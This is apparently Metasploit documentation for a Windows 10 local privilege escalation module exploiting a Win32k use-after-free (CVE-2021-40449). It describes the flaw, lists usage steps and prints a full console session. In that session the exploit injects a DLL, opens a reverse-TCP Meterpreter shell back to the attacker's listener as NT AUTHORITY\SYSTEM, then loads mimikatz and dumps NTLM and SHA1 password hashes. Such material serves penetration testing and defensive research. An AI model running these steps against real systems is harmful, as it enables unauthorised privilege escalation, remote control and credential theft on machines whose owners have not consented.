## Vulnerable Application

A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by
an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact
that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers
can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object
that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle
with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the
attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the
kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM.

This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however
previous versions of Windows 10 will likely also work.

Note the exploit may occasionally not work the first time so you may have to run it again to get the results.

## Options

## Verification Steps

1. Get a non-SYSTEM meterpreter session on Win10 RS5 x64
2. `use exploit/windows/local/cve_2021_40449`
3. `set session <session>`
4. `exploit`
5. Get a SYSTEM session

## Scenarios

### Windows 10 1809 Build 17763.2114 x64

```
msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.28.156.210:4444
[*] Sending stage (200262 bytes) to 172.28.156.210
[*] Meterpreter session 1 opened (172.28.145.185:36167 -> 172.28.156.210:4444 ) at 2021-11-05 15:45:08 -0500

meterpreter > getuid
Server username: DESKTOP-3GHNQ93\normal
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The system cannot find the file specified. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > sysinfo
Computer        : DESKTOP-3GHNQ93
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/cve_2021_40449
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2021_40449) > show options

Module options (exploit/windows/local/cve_2021_40449):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.28.145.185   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)


msf exploit(windows/local/cve_2021_40449) > set SESSION 1
SESSION => 1
msf exploit(windows/local/cve_2021_40449) > set LPORT 9988
LPORT => 9988
msf exploit(windows/local/cve_2021_40449) > exploit

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 172.28.145.185:9988
[*] Running automatic check ("set AutoCheck false" to disable)
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf exploit(windows/local/cve_2021_40449) > exploit

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 172.28.145.185:9988
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target's build number: 10.0.17763.2114
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching msiexec to host the DLL...
[+] Process 2520 launched.
[*] Reflectively injecting the DLL into 2520...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 172.28.156.210
[*] Meterpreter session 2 opened (172.28.145.185:9988 -> 172.28.156.210:49900 ) at 2021-11-05 15:46:21 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...c
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
normal    DESKTOP-3GHNQ93  a38673ad58b19421e952fc317b62c3c4  ccff8cc980f0024dc5b3f925194a35c0fa0231c3
test      DESKTOP-3GHNQ93  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-3GHNQ93$  WORKGROUP        (null)
normal            DESKTOP-3GHNQ93  (null)
test              DESKTOP-3GHNQ93  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-3ghnq93$  WORKGROUP        (null)
normal            DESKTOP-3GHNQ93  (null)
test              DESKTOP-3GHNQ93  (null)


meterpreter >
```
